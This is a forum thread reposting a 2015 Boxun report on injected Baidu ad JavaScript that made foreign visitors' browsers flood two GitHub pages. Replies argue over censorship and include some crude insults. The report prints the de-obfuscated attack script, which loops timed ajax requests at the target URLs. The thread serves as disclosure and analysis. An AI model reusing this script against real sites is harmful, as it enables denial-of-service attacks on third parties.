中国的国家防火墙调用民间流量攻击境外网站

[msc_de]

中国的国家防火墙调用民间流量攻击境外网站
请看博讯热点：网络封锁和压制
(博讯北京时间2015年3月27日 首发 - 支持此文作者/记者)
    26日9时（Pacific Daylight Time，北京时间27日12时）左右开始，从境外访问v.baidu.com的时候发现会出现Javascript alert出现的弹窗：
   
     WARNING: malicious javascript detected on this domain


   
    追查了一下发现是百度广告管家的js http://cbjs.baidu.com/js/m.js?_=1427431567741
    在境外访问时被替换成一段特殊的js。详细请求和返回的js见：http://pastie.org/10056531
   
    反编译后代码大致如下：
    "document.write("     src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");!window.jQuery&&document.write("     src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime=(new
    Date).getTime();var count=0;function unixtime(){var a=new Date;return
    Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["https://github.com/greatfire/","https://github.com/cn-nytimes/"];NUM=url_array.length;function
    r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
    b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
    Date).getTime()},complete:function(){responseTime=(new
    Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
    r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3);"
   
    很明显看出两个攻击目标： https://github.com/greatfire/ 和 https://github.com/cn-nytimes/
   
    大致的流程就是：
   
    1. GFW把某些常见网站的JS替换成以上js
   
    2. 全球各地访问国内网站时，相当于成为DoS的源（可能还有全国各地访问国外时，未经确认）
   
    3. GitHub不堪重负，把 https://github.com/greatfire/ 和
    https://github.com/cn-nytimes/ 的返回改成一个alert: WARNING: malicious
    javascript detected on this domain （网站存在恶意JS代码调用）
   
    当境外用户访问内置境内一些网站如百度的JS调用的网站时，中国的国家防火墙GFW将这部分调用替换成重定向至目标网站，以调用民用流量的方式，实现对目标网站的DDOS攻击。中国网络审查监测机构Greatfire和纽约时报中文网目前尚未就此作出回应。 [博讯首发,转载请注明出处]- 支持此文作者/记者(博讯 boxun.com)
4941430

[BlackMirror]

挺无语的
GFW正在努力寻求存在感...

想知道一些事情的人，总是能翻墙的
不关心的人也不必翻

[umairsaleem]

挺无语的
GFW正在努力寻求存在感...

想知道一些事情的人，总是能翻墙的
不关心的人也不必翻

不要这样说，就是instagram被封锁之前玩的人很多，那次被封了，虽然大家都基本懂得翻墙，但是不用半年就基本很少人上的，这不是关系到会不会翻墙的问题，而且成本，麻烦，一定程度上是有效果的。

[Big0Bang]

G.F.W等相关技术领先世界几百年。

[Zhan21]

挺无语的
GFW正在努力寻求存在感...

想知道一些事情的人，总是能翻墙的
不关心的人也不必翻

不要这样说，就是instagram被封锁之前玩的人很多，那次被封了，虽然大家都基本懂得翻墙，但是不用半年就基本很少人上的，这不是关系到会不会翻墙的问题，而且成本，麻烦，一定程度上是有效果的。

说的对。显然长期看来，封锁是有效果的。就好像国内社交网络都很少用FACEBOOK一样，使用什么社交平台是有外部效应的。

[msc_de]

封锁有用吗，看看柏林墙就知道了。傻逼们只是在重复走失败者的历史老路
猪一样的智慧者有了GFW对他们更合适，圈养嘛

[zcxvbs]

封锁有用吗，看看柏林墙就知道了。傻逼们只是在重复走失败者的历史老路
猪一样的智慧者有了GFW对他们更合适，圈养嘛

有用的，不过只是拖缓变革的发生，但是总有一天所有都会觉悟。但是中国的情况跟当你的德国不大一样，中共这套体制让中央主席到一个镇的镇长都受益，从而让这些人会极力维护这个体制的存在，所以中国要发生变革的条件可能要比当年的德国高很多。

[randyshan]

封锁有用吗，看看柏林墙就知道了。傻逼们只是在重复走失败者的历史老路
猪一样的智慧者有了GFW对他们更合适，圈养嘛

有用的，不过只是拖缓变革的发生，但是总有一天所有都会觉悟。但是中国的情况跟当你的德国不大一样，中共这套体制让中央主席到一个镇的镇长都受益，从而让这些人会极力维护这个体制的存在，所以中国要发生变革的条件可能要比当年的德国高很多。

没错，很有用的，他们很坏，但不要认为他们很笨。